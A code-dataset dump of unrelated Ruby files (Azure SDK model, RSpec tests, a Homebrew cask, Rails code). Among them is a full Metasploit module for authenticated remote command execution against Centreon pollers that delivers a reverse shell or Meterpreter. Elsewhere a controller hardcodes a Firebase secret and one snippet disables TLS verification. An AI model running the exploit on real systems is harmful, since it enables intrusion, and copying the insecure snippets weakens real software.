hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e9bffeb8867bb90e773c39b00879544834766a0a | 3,348 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Cosmosdb::Mgmt::V2019_12_12
module Models
#
# Parameters to create and update Cosmos DB Table.
#
class TableCreateUpdateParameters < ARMResourceProperties
include MsRestAzure
# @return [TableResource] The standard JSON format of a Table
attr_accessor :resource
# @return [CreateUpdateOptions] A key-value pair of options to be applied
# for the request. This corresponds to the headers sent with the request.
attr_accessor :options
#
# Mapper for TableCreateUpdateParameters class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'TableCreateUpdateParameters',
type: {
name: 'Composite',
class_name: 'TableCreateUpdateParameters',
model_properties: {
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
location: {
client_side_validation: true,
required: false,
serialized_name: 'location',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
resource: {
client_side_validation: true,
required: true,
serialized_name: 'properties.resource',
type: {
name: 'Composite',
class_name: 'TableResource'
}
},
options: {
client_side_validation: true,
required: true,
serialized_name: 'properties.options',
type: {
name: 'Composite',
class_name: 'CreateUpdateOptions'
}
}
}
}
}
end
end
end
end
| 29.892857 | 79 | 0.453405 |
3925efd8af634743cbbc1dfa9f87e5d555b273fb | 3,042 | describe RedClothParslet::Parser::Attributes::LinkUri do
let(:parser) { described_class.new }
# Though technically valid, punctuation is not allowed at the end of a URL in
# the context of inline Textile.
describe "termination" do
it { should parse("http://red.cloth.org") }
it { should parse("http://redcloth.org./") }
TERMINAL_LINK_PUNCTUATION = %w(. ! , ;)
TERMINAL_LINK_PUNCTUATION.each do |punct|
it { should parse("http://redcloth.org/text#{punct}ile") }
it { should parse("http://redcloth.org/text#{punct}ile.html") }
it { should parse("http://redcloth.org/text#{punct}ile/") }
it { should parse("http://redcloth.org/#{punct}#") }
it { should parse("http://redcloth.org/#foo#{punct}bar") }
it { should parse("/foo#{punct}bar") }
it { should parse("/foo#{punct}/") }
it { should parse("foo#{punct}bar") }
it { should parse("foo#{punct};bar") }
it { should parse("foo;bar#{punct}baz") }
it { should parse("index?foo=bar#{punct}baz") }
end
(TERMINAL_LINK_PUNCTUATION + [')']).each do |punct|
it { should_not parse("http://redcloth.org#{punct}") }
it { should_not parse("http://redcloth.org/#{punct}") }
it { should_not parse("http://redcloth.org/textile#{punct}") }
it { should_not parse("http://redcloth.org/textile.html#{punct}") }
it { should_not parse("http://redcloth.org/textile/#{punct}") }
it { should_not parse("http://redcloth.org/##{punct}") }
it { should_not parse("http://redcloth.org/#foo#{punct}") }
it { should_not parse("/foo#{punct}") }
it { should_not parse("/foo/#{punct}") }
it { should_not parse("foo#{punct}") }
it { should_not parse("foo;bar#{punct}") }
it { should_not parse("index?foo=bar#{punct}") }
end
end
describe "matched parentheses" do
it { should parse("http://redcloth.org/text(ile)") }
it { should parse("http://redcloth.org/text(ile).html") }
it { should parse("http://redcloth.org/text(ile)/") }
it { should parse("http://redcloth.org/text(ile)#") }
it { should parse("http://redcloth.org/#foo(bar)") }
it { should parse("/foo(bar)") }
it { should parse("/foo(bar)/") }
it { should parse("foo(bar)") }
it { should parse("foo(t);bar") }
it { should parse("foo;bar(none)baz") }
it { should parse("index?foo=bar(none)baz") }
it { should parse("#foo(bar)") }
end
describe "opening parentheses" do
it { should parse("http://redcloth.org/text(ile") }
it { should parse("http://redcloth.org/text(ile.html") }
it { should parse("http://redcloth.org/text(ile/") }
it { should parse("http://redcloth.org/text(ile#") }
it { should parse("http://redcloth.org/#foo(bar") }
it { should parse("/foo(bar") }
it { should parse("/foo(bar/") }
it { should parse("foo(bar") }
it { should parse("foo(t;bar") }
it { should parse("foo;bar(nonebaz") }
it { should parse("index?foo=bar(nonebaz") }
it { should parse("#foo(bar") }
end
end
| 41.671233 | 79 | 0.605851 |
6a9f3ce26532891c527c8e4b1469b05283facd77 | 4,014 | require 'spec_helper'
describe 'openstacklib::db::postgresql' do
password_hash = 'AA1420F182E88B9E5F874F6FBE7459291E8F4601'
title = 'nova'
let (:title) { title }
let :required_params do
{ :password_hash => password_hash }
end
let (:pre_condition) do
"include ::postgresql::server"
end
context 'on a RedHat osfamily' do
let :facts do
{
:osfamily => 'RedHat',
:operatingsystem => 'RedHat',
:operatingsystemrelease => '7.1',
:operatingsystemmajrelease => '7',
:concat_basedir => '/tmp',
}
end
context 'with only required parameters' do
let :params do
required_params
end
it { is_expected.to contain_postgresql__server__db(title).with(
:user => title,
:password => password_hash
)}
end
context 'when overriding encoding' do
let :params do
{ :encoding => 'latin1' }.merge(required_params)
end
it { is_expected.to contain_postgresql__server__db(title).with_encoding(params[:encoding]) }
end
context 'when omitting the required parameter password_hash' do
let :params do
required_params.delete(:password_hash)
end
it { expect { is_expected.to raise_error(Puppet::Error) } }
end
context 'when notifying other resources' do
let :pre_condition do
"include ::postgresql::server
exec { 'nova-db-sync': }"
end
let :params do
{ :notify => 'Exec[nova-db-sync]'}.merge(required_params)
end
it {is_expected.to contain_exec('nova-db-sync').that_subscribes_to("Openstacklib::Db::Postgresql[#{title}]") }
end
context 'when required for other openstack services' do
let :pre_condition do
"include ::postgresql::server
service {'keystone':}"
end
let :title do
'keystone'
end
let :params do
{ :before => 'Service[keystone]'}.merge(required_params)
end
it { is_expected.to contain_service('keystone').that_requires("Openstacklib::Db::Postgresql[keystone]") }
end
end
context 'on a Debian osfamily' do
let :facts do
{
:osfamily => 'Debian',
:operatingsystem => 'Debian',
:operatingsystemrelease => 'jessie',
:operatingsystemmajrelease => '8.2',
:concat_basedir => '/tmp',
}
end
context 'with only required parameters' do
let :params do
required_params
end
it { is_expected.to contain_postgresql__server__db(title).with(
:user => title,
:password => password_hash
)}
end
context 'when overriding encoding' do
let :params do
{ :encoding => 'latin1' }.merge(required_params)
end
it { is_expected.to contain_postgresql__server__db(title).with_encoding(params[:encoding]) }
end
context 'when omitting the required parameter password_hash' do
let :params do
required_params.delete(:password_hash)
end
it { expect { is_expected.to raise_error(Puppet::Error) } }
end
context 'when notifying other resources' do
let :pre_condition do
"include ::postgresql::server
exec { 'nova-db-sync': }"
end
let :params do
{ :notify => 'Exec[nova-db-sync]'}.merge(required_params)
end
it {is_expected.to contain_exec('nova-db-sync').that_subscribes_to("Openstacklib::Db::Postgresql[#{title}]") }
end
context 'when required for other openstack services' do
let :pre_condition do
"include ::postgresql::server
service {'keystone':}"
end
let :title do
'keystone'
end
let :params do
{ :before => 'Service[keystone]'}.merge(required_params)
end
it { is_expected.to contain_service('keystone').that_requires("Openstacklib::Db::Postgresql[keystone]") }
end
end
end
| 26.939597 | 116 | 0.606876 |
2194cb54b13d95dbefabb87c0fb1743da205cd57 | 3,719 | cask "karabiner-elements" do
if MacOS.version <= :el_capitan
version "11.6.0"
sha256 "c1b06252ecc42cdd8051eb3d606050ee47b04532629293245ffdfa01bbc2430d"
url "https://pqrs.org/osx/karabiner/files/Karabiner-Elements-#{version}.dmg"
pkg "Karabiner-Elements.sparkle_guided.pkg"
elsif MacOS.version <= :mojave
version "12.10.0"
sha256 "53252f7d07e44f04972afea2a16ac595552c28715aa65ff4a481a1c18c8be2f4"
url "https://github.com/pqrs-org/Karabiner-Elements/releases/download/v#{version}/Karabiner-Elements-#{version}.dmg",
verified: "github.com/pqrs-org/Karabiner-Elements/"
pkg "Karabiner-Elements.sparkle_guided.pkg"
else
version "13.7.0"
sha256 "9ac5e53a71f3a00d7bdb2f5f5f001f70b6b8b7b2680e10a929e0e4c488c8734b"
url "https://github.com/pqrs-org/Karabiner-Elements/releases/download/v#{version}/Karabiner-Elements-#{version}.dmg",
verified: "github.com/pqrs-org/Karabiner-Elements/"
pkg "Karabiner-Elements.pkg"
end
name "Karabiner Elements"
desc "Keyboard customizer"
homepage "https://pqrs.org/osx/karabiner/"
livecheck do
url "https://pqrs.org/osx/karabiner/files/karabiner-elements-appcast.xml"
strategy :sparkle
end
auto_updates true
depends_on macos: ">= :el_capitan"
if MacOS.version <= :mojave
uninstall signal: [
["TERM", "org.pqrs.Karabiner-Menu"],
["TERM", "org.pqrs.Karabiner-NotificationWindow"],
],
pkgutil: "org.pqrs.Karabiner-Elements",
launchctl: [
"org.pqrs.karabiner.agent.karabiner_grabber",
"org.pqrs.karabiner.agent.karabiner_observer",
"org.pqrs.karabiner.karabiner_console_user_server",
"org.pqrs.karabiner.karabiner_kextd",
"org.pqrs.karabiner.karabiner_session_monitor",
],
script: {
executable: "/Library/Application Support/org.pqrs/Karabiner-Elements/uninstall_core.sh",
sudo: true,
},
delete: "/Library/Application Support/org.pqrs/"
else
uninstall early_script: {
executable: "/Library/Application Support/org.pqrs/Karabiner-DriverKit-VirtualHIDDevice/scripts/uninstall/remove_files.sh",
sudo: true,
},
signal: [
["TERM", "org.pqrs.Karabiner-Menu"],
["TERM", "org.pqrs.Karabiner-NotificationWindow"],
],
pkgutil: [
"org.pqrs.Karabiner-DriverKit-VirtualHIDDevice",
"org.pqrs.Karabiner-Elements",
],
launchctl: [
"org.pqrs.karabiner.agent.karabiner_grabber",
"org.pqrs.karabiner.agent.karabiner_observer",
"org.pqrs.karabiner.karabiner_console_user_server",
"org.pqrs.karabiner.karabiner_session_monitor",
],
script: {
executable: "/Library/Application Support/org.pqrs/Karabiner-Elements/uninstall_core.sh",
sudo: true,
},
delete: "/Library/Application Support/org.pqrs/"
# The system extension 'org.pqrs.Karabiner-DriverKit-VirtualHIDDevice*' should not be uninstalled by Cask
end
zap trash: [
"~/.config/karabiner",
"~/.local/share/karabiner",
"~/Library/Application Scripts/org.pqrs.Karabiner-VirtualHIDDevice-Manager",
"~/Library/Application Support/Karabiner-Elements",
"~/Library/Caches/org.pqrs.Karabiner-Elements.Updater",
"~/Library/Containers/org.pqrs.Karabiner-VirtualHIDDevice-Manager",
"~/Library/Preferences/org.pqrs.Karabiner-Elements.Updater.plist",
]
end
| 39.56383 | 129 | 0.639419 |
91ef17fcc61215c2c3214f37f93658af957ed4e4 | 1,259 | # frozen_string_literal: true
require 'pdf_mage/workers/render_pdf'
RSpec.describe PdfMage::Workers::RenderPdf do
describe '#perform' do
let(:callback_url) { 'https://example.com/callback' }
let(:filename) { nil }
let(:meta) { nil }
let(:website_url) { 'https://google.com' }
subject do
PdfMage::Workers::RenderPdf.perform_async(website_url, callback_url, filename, meta)
end
context 'when given a filename' do
it 'exports a PDF to the path that matches the filename' do
end
end
context 'when not given a filename' do
it 'exports a PDF to a path with a generated filename' do
end
end
context 'when an aws_account_key is present' do
it 'starts an upload file job' do
end
context 'and a callback url is present' do
it 'starts an upload file job' do
end
end
end
context 'when an aws_account_key is not present' do
it 'does not start an upload file job' do
end
context 'and a callback url is present' do
it 'starts a send webhook job' do
end
end
context 'and a callback url is not present' do
it 'does not start a send webhook job' do
end
end
end
end
end
| 24.211538 | 90 | 0.635425 |
016b8ef16a68dbeca1060e8187155dec32969261 | 7,516 | module Deface
class Override
include OriginalValidator
include Applicator
extend Applicator::ClassMethods
extend Search::ClassMethods
cattr_accessor :_early, :current_railtie
attr_accessor :args, :parsed_document, :failure
@@_early = []
# Initializes new override, you must supply only one Target, Action & Source
# parameter for each override (and any number of Optional parameters).
#
# See READme for more!
def initialize(args, &content)
if Rails.application.try(:config).try(:deface).try(:enabled)
unless Rails.application.config.deface.try(:overrides)
@@_early << args
warn "[WARNING] You no longer need to manually require overrides, remove require for '#{args[:name]}'."
return
end
else
warn "[WARNING] You no longer need to manually require overrides, remove require for '#{args[:name]}'."
return
end
# If no name was specified, use the filename and line number of the caller
# Including the line number ensure unique names if multiple overrides
# are defined in the same file
unless args.key? :name
parts = caller[0].split(':')
file_name = File.basename(parts[0], '.rb')
line_number = parts[1]
args[:name] = "#{file_name}_#{line_number}"
end
raise(ArgumentError, ":name must be defined") unless args.key? :name
raise(ArgumentError, ":virtual_path must be defined") if args[:virtual_path].blank?
args[:text] = content.call if block_given?
args[:name] = "#{current_railtie.underscore}_#{args[:name]}" if Rails.application.try(:config).try(:deface).try(:namespaced) || args.delete(:namespaced)
virtual_key = args[:virtual_path].to_sym
name_key = args[:name].to_s.parameterize
self.class.all[virtual_key] ||= {}
if self.class.all[virtual_key].has_key? name_key
#updating exisiting override
@args = self.class.all[virtual_key][name_key].args
#check if the action is being redefined, and reject old action
if (self.class.actions & args.keys).present?
@args.reject!{|key, value| (self.class.actions & @args.keys).include? key }
end
#check if the source is being redefined, and reject old action
if (Deface::DEFAULT_SOURCES.map(&:to_sym) & args.keys).present?
@args.reject!{|key, value| (Deface::DEFAULT_SOURCES.map(&:to_sym) & @args.keys).include? key }
end
@args.merge!(args)
else
#initializing new override
@args = args
raise(ArgumentError, ":action is invalid") if self.action.nil?
end
#set loaded time (if not already present) for hash invalidation
@args[:updated_at] ||= Time.zone.now.to_f
@args[:railtie_class] = self.class.current_railtie
self.class.all[virtual_key][name_key] = self
expire_compiled_template
self
end
def selector
@args[self.action]
end
def name
@args[:name]
end
def railtie_class
@args[:railtie_class]
end
def sequence
return 100 unless @args.key?(:sequence)
if @args[:sequence].is_a? Hash
key = @args[:virtual_path].to_sym
if @args[:sequence].key? :before
ref_name = @args[:sequence][:before]
if self.class.all[key].key? ref_name.to_s
return self.class.all[key][ref_name.to_s].sequence - 1
else
return 100
end
elsif @args[:sequence].key? :after
ref_name = @args[:sequence][:after]
if self.class.all[key].key? ref_name.to_s
return self.class.all[key][ref_name.to_s].sequence + 1
else
return 100
end
else
#should never happen.. tut tut!
return 100
end
else
return @args[:sequence].to_i
end
rescue SystemStackError
if defined?(Rails)
Rails.logger.error "\e[1;32mDeface: [WARNING]\e[0m Circular sequence dependency includes override named: '#{self.name}' on '#{@args[:virtual_path]}'."
end
return 100
end
def action
(self.class.actions & @args.keys).first
end
# Returns the markup to be inserted / used
#
def source
sources = Rails.application.config.deface.sources
source = sources.find { |source| source.to_sym == source_argument }
raise(DefaceError, "Source #{source} not found.") unless source
source.execute(self) || ''
end
# Returns a :symbol for the source argument present
#
def source_argument
Deface::DEFAULT_SOURCES.detect { |source| @args.key? source.to_sym }.try :to_sym
end
def source_element
Deface::Parser.convert(source.clone)
end
def safe_source_element
return unless source_argument
source_element
end
def disabled?
@args.key?(:disabled) ? @args[:disabled] : false
end
def end_selector
return nil if @args[:closing_selector].blank?
@args[:closing_selector]
end
# returns attributes hash for attribute related actions
#
def attributes
@args[:attributes] || []
end
# Alters digest of override to force view method
# recompilation (when source template/partial changes)
#
def touch
@args[:updated_at] = Time.zone.now.to_f
end
# Creates MD5 hash of args sorted keys and values
# used to determine if an override has changed
#
def digest
to_hash = @args.keys.map(&:to_s).sort.concat(@args.values.map(&:to_s).sort).join
Deface::Digest.hexdigest(to_hash)
end
# Creates MD5 of all overrides that apply to a particular
# virtual_path, used in CompiledTemplates method name
# so we can support re-compiling of compiled method
# when overrides change. Only of use in production mode.
#
def self.digest(details)
overrides = self.find(details)
to_hash = overrides.inject('') { |digest, override| digest << override.digest }
Deface::Digest.hexdigest(to_hash)
end
def self.all
Rails.application.config.deface.overrides.all
end
def self.actions
Rails.application.config.deface.actions.map &:to_sym
end
private
# check if method is compiled for the current virtual path
#
def expire_compiled_template
if Gem.loaded_specs["rails"].version < Gem::Version.new("6.0.0.beta1")
if compiled_method_name = ActionView::CompiledTemplates.instance_methods.detect { |name| name =~ /#{args[:virtual_path].gsub(/[^a-z_]/, '_')}/ }
#if the compiled method does not contain the current deface digest
#then remove the old method - this will allow the template to be
#recompiled the next time it is rendered (showing the latest changes)
unless compiled_method_name =~ /\A_#{self.class.digest(:virtual_path => @args[:virtual_path])}_/
ActionView::CompiledTemplates.send :remove_method, compiled_method_name
end
end
else
if compiled_method_name = ActionDispatch::DebugView.instance_methods.detect { |name| name =~ /#{args[:virtual_path].gsub(/[^a-z_]/, '_')}/ }
unless compiled_method_name =~ /\A_#{self.class.digest(:virtual_path => @args[:virtual_path])}_/
ActionDispatch::DebugView.send :remove_method, compiled_method_name
end
end
end
end
end
end
| 31.447699 | 158 | 0.637041 |
1d20db726e7847995f82c67117db145824bf845c | 1,158 | # Sources/resources:
# https://stackoverflow.com/questions/11806004/rails-activerecord-db-sort-operation-case-insensitive
class StaticPagesController < ApplicationController
# require 'firebase'
def letsencrypt
render text: "#{params[:id]}.9l4va-Uy7XrFPGS51hnH7HwkF2nn3XhwfuR8U5ylxIM"
end
#the homepage of the app
def home
if logged_in?
@micropost = current_user.microposts.build
@feed_items = current_user.feed.paginate(page: params[:page])
@rating_items = current_user.rating_feed.paginate(page: params[:page])
# @events = Event.all
@time = Time.now + 60.days
@start = Time.now - 1.days
# @events = Event.where(:date => @start..@time)
@events = Event.all
end
firebase_url = 'https://skatespots-3a8f0.firebaseio.com'
firebase_secret = 'yZGqkNt8sd5en5F2ICXDqo2lhUgVqXbVuLEk8QbG'
firebase = Firebase::Client.new(firebase_url, firebase_secret)
end
def help
end
def contact
end
def skate_links
# @organizations = Organization.where(:approved => true).order(name: :asc)
@organizations = Organization.where(:approved => true).order("lower(name) ASC").all
end
def testing
end
end
| 26.930233 | 100 | 0.724525 |
6a541c1c77ab883ce80d47a6ab8c3b12744e3bed | 1,508 | # encoding: utf-8
class PinImageUploader < CarrierWave::Uploader::Base
# Include RMagick or MiniMagick support:
# include CarrierWave::RMagick
include CarrierWave::MiniMagick
# Choose what kind of storage to use for this uploader:
storage :file
# storage :fog
# Override the directory where uploaded files will be stored.
# This is a sensible default for uploaders that are meant to be mounted:
def store_dir
"uploads/#{model.class.to_s.underscore}/#{mounted_as}/#{model.id}"
end
# Provide a default URL as a default if there hasn't been a file uploaded:
# def default_url
# # For Rails 3.1+ asset pipeline compatibility:
# # ActionController::Base.helpers.asset_path("fallback/" + [version_name, "default.png"].compact.join('_'))
#
# "/images/fallback/" + [version_name, "default.png"].compact.join('_')
# end
# Process files as they are uploaded:
# process :scale => [200, 300]
#
# def scale(width, height)
# # do something
# end
# Create different versions of your uploaded files:
version :thumb do
process :resize_to_fit => [300, 300]
end
# Add a white list of extensions which are allowed to be uploaded.
# For images you might use something like this:
# def extension_white_list
# %w(jpg jpeg gif png)
# end
# Override the filename of the uploaded files:
# Avoid using model.id or version_name here, see uploader/store.rb for details.
# def filename
# "something.jpg" if original_filename
# end
end
| 29 | 112 | 0.699602 |
ffc5b87b6aa0329f4c60138864d50286069735be | 2,203 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20170602075004) do
create_table "microposts", force: :cascade do |t|
t.text "content"
t.integer "user_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "picture"
t.index ["user_id", "created_at"], name: "index_microposts_on_user_id_and_created_at"
t.index ["user_id"], name: "index_microposts_on_user_id"
end
create_table "relationships", force: :cascade do |t|
t.integer "follower_id"
t.integer "followed_id"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.index ["followed_id"], name: "index_relationships_on_followed_id"
t.index ["follower_id", "followed_id"], name: "index_relationships_on_follower_id_and_followed_id", unique: true
t.index ["follower_id"], name: "index_relationships_on_follower_id"
end
create_table "users", force: :cascade do |t|
t.string "name"
t.string "email"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.string "password_digest"
t.string "remember_digest"
t.boolean "admin", default: false
t.string "activation_digest"
t.boolean "activated", default: false
t.datetime "activated_at"
t.string "reset_digest"
t.datetime "reset_sent_at"
t.index ["email"], name: "index_users_on_email", unique: true
end
end
| 42.365385 | 116 | 0.705856 |
bfee72f63afc72fa2ecf7e2b29c81de69d4cb76e | 304 | url = node['device42']['instance']
user = node['device42']['user']
password = node['device42']['password']
OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
ip = IPAM.new(url, user, password).suggest_ip('10.90.0.0/16')
puts ip
reserved = IPAM.new(url, user, password).reserve_ip(ip)
puts reserved
| 25.333333 | 61 | 0.707237 |
33148e92012a5fe7cd9cb17144238c3d07a61f28 | 10,542 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Centreon Poller Authenticated Remote Command Execution',
'Description' => %q{
An authenticated user with sufficient administrative rights to manage pollers can use this functionality to
execute arbitrary commands remotely. Usually, the miscellaneous commands are used by the additional modules
(to perform certain actions), by the scheduler for data processing, etc.
This module uses this functionality to obtain a remote shell on the target.
},
'Author' => [
'Omri Baso', # discovery
'Fabien Aunay', # discovery
'mekhalleh (RAMELLA SΓ©bastien)' # this module
],
'References' => [
['EDB', '47977']
],
'DisclosureDate' => '2020-01-27',
'License' => MSF_LICENSE,
'Platform' => ['linux', 'unix'],
'Arch' => [ARCH_CMD, ARCH_X64],
'Privileged' => true,
'Targets' => [
[
'Reverse shell (In-Memory)',
{
'Platform' => 'unix',
'Type' => :cmd_unix,
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Meterpreter (Dropper)',
{
'Platform' => 'linux',
'Type' => :meterpreter,
'Arch' => ARCH_X64,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'CMDSTAGER::FLAVOR' => :curl
}
}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('PASSWORD', [true, 'The Centreon Web panel password to authenticate with']),
OptString.new('TARGETURI', [true, 'The URI of the Centreon Web panel path', '/centreon']),
OptString.new('USERNAME', [true, 'The Centreon Web panel username to authenticate with'])
])
end
def create_new_poller(poller_name, command_id)
params = { 'p' => '60901' }
print_status('Create new poller entry on the target.')
token = get_token(normalize_uri(target_uri.path, 'main.get.php'), params)
return false unless token
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.get.php'),
'cookie' => @cookies,
'partial' => true,
'vars_get' => params,
'vars_post' => {
'name' => poller_name,
'ns_ip_address' => '127.0.0.1',
'localhost[localhost]' => '1',
'is_default[is_default]' => '0',
'remote_id' => '',
'ssh_port' => '22',
'remote_server_centcore_ssh_proxy[remote_server_centcore_ssh_proxy]' => '1',
'engine_start_command' => 'service centengine start',
'engine_stop_command' => 'service centengine stop',
'engine_restart_command' => 'service centengine restart',
'engine_reload_command' => 'service centengine reload',
'nagios_bin' => '/usr/sbin/centengine',
'nagiostats_bin' => '/usr/sbin/centenginestats',
'nagios_perfdata' => '/var/log/centreon-engine/service-perfdata',
'broker_reload_command' => 'service cbd reload',
'centreonbroker_cfg_path' => '/etc/centreon-broker',
'centreonbroker_module_path' => '/usr/share/centreon/lib/centreon-broker',
'centreonbroker_logs_path' => '/var/log/centreon-broker',
'centreonconnector_path' => '',
'init_script_centreontrapd' => 'centreontrapd',
'snmp_trapd_path_conf' => '/etc/snmp/centreon_traps/',
'pollercmd[0]' => command_id,
'clone_order_pollercmd_0' => '',
'ns_activate[ns_activate]' => '1',
'submitA' => 'Save',
'id' => '',
'o' => 'a',
'centreon_token' => token
}
)
return false unless response
return true
end
def execute_command(command, _opts = {})
cmd_name = rand_text_alpha(8..42)
params = { 'p' => '60803', 'type' => '3' }
poller_name = rand_text_alpha(8..42)
## Register a miscellaneous command.
print_status('Upload command payload on the target.')
token = get_token(normalize_uri(target_uri.path, 'main.get.php'), params)
unless token
print_bad('Could not get the upload form token, potentially due to insufficient access rights.')
return false
end
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.get.php'),
'cookie' => @cookies,
'partial' => true,
'vars_get' => params,
'vars_post' => {
'command_name' => cmd_name,
'command_type[command_type]' => '3',
'command_line' => command,
'resource' => '$CENTREONPLUGINS$',
'plugins' => '/Centreon/SNMP',
'macros' => '$ADMINEMAIL$',
'command_example' => '',
'listOfArg' => '',
'listOfMacros' => '',
'connectors' => '',
'graph_id' => '',
'command_activate[command_activate]' => '1',
'command_comment' => '',
'submitA' => 'Save',
'command_id' => '',
'type' => '3',
'o' => 'a',
'centreon_token' => token
}
)
return false unless response
## Create new poller to serve the payload.
create_new_poller(poller_name, get_command_id(cmd_name))
## Export configuration to reload to trigger the exploit.
poller_id = get_poller_id(poller_name)
if poller_id.nil?
print_bad('Could not trigger the vulnerability!')
end
restart_exportation(poller_id)
end
def get_auth
print_status('Sending authentication request.')
token = get_token(normalize_uri(target_uri.path, 'index.php'))
unless token.nil?
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'cookie' => @cookies,
'vars_post' => {
'useralias' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'submitLogin' => 'Connect',
'centreon_token' => token
}
)
return false unless response
if response.redirect? && response.headers['location'].include?('main.php')
print_good('Successfully authenticated.')
@cookies = response.get_cookies
return true
end
end
print_bad('Your credentials are incorrect.')
return false
end
def get_command_id(cmd_name)
response = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'main.get.php'),
'cookie' => @cookies,
'vars_get' => {
'p' => '60803',
'type' => '3'
}
)
return nil unless response
href = response.get_html_document.at("//a[contains(text(), \"#{cmd_name}\")]")['href']
return nil unless href
id = href.split('?')[1].split('&')[2].split('=')[1]
return id unless id.empty?
return nil
end
def get_poller_id(poller_name)
response = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'main.get.php'),
'cookie' => @cookies,
'vars_get' => { 'p' => '60901' }
)
return nil unless response
href = response.get_html_document.at("//a[contains(text(), \"#{poller_name}\")]")['href']
return nil unless href
id = href.split('?')[1].split('&')[2].split('=')[1]
return id unless id.empty?
return nil
end
def get_session
response = send_request_cgi(
'method' => 'HEAD',
'uri' => normalize_uri(target_uri.path, 'index.php')
)
cookies = response.get_cookies
return cookies unless cookies.empty?
end
def get_token(uri, params = {})
## Get centreon_token value.
request = {
'method' => 'GET',
'uri' => uri,
'cookie' => @cookies
}
request = request.merge({ 'vars_get' => params }) unless params.empty?
response = send_request_cgi(request)
return nil unless response
begin
token = response.get_html_document.at('input[@name="centreon_token"]')['value']
rescue NoMethodError
return nil
end
return token
end
def restart_exportation(poller_id)
print_status('Reload the poller to trigger exploitation.')
token = get_token(normalize_uri(target_uri.path, 'main.get.php'), { 'p' => '60902', 'poller' => poller_id })
unless token
print_bad('Could not get the poller form token, potentially due to insufficient access rights.')
return false
end
vprint_status(' -- Generating files.')
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'generateFiles.php'),
'cookie' => @cookies,
'vars_post' => {
'poller' => poller_id,
'debug' => 'true',
'generate' => 'true'
}
)
return false unless response
vprint_status(' -- Restarting engine.')
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'restartPollers.php'),
'cookie' => @cookies,
'vars_post' => {
'poller' => poller_id,
'mode' => '2'
}
)
return false unless response
vprint_status(' -- Executing command.')
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'postcommand.php'),
'cookie' => @cookies,
'vars_post' => { 'poller' => poller_id }
)
return false unless response
return true
end
def exploit
@cookies = get_session
logged = get_auth unless @cookies.empty?
if logged
case target['Type']
when :cmd_unix
execute_command(payload.encoded)
when :meterpreter
execute_command(generate_cmdstager.join(';'))
end
end
end
end
| 31.189349 | 121 | 0.582812 |
87b3837149103f0a007a9f40d83eb0aa0f2bb28f | 398 | module Jobs
class SyncBackupsToDrive < ::Jobs::Base
sidekiq_options queue: 'low'
def execute(arg)
backups = Backup.all.take(SiteSetting.discourse_sync_to_googledrive_quantity)
backups.each do |backup|
DiscourseBackupToDrive::DriveSynchronizer.new(backup).sync
end
DiscourseBackupToDrive::DriveSynchronizer.new(backups).delete_old_files
end
end
end
| 26.533333 | 83 | 0.738693 |
bba1bd02cd94c58f32917af9b14859c28ae4d4e6 | 23 | module StudyHelper
end
| 7.666667 | 18 | 0.869565 |
bf912fbfc8f0647fff83399b8c73a06df84be74a | 282 | class InterleavedInnocentJointable < ActiveRecord::Migration
def self.up
create_table("people_reminders", :id => false) do |t|
t.column :reminder_id, :integer
t.column :person_id, :integer
end
end
def self.down
drop_table "people_reminders"
end
end
| 21.692308 | 60 | 0.702128 |
1d0a397520793d886d52e9fccfaa425c6b8bcb78 | 623 | PADRINO_ROOT = File.dirname(__FILE__) unless defined? PADRINO_ROOT
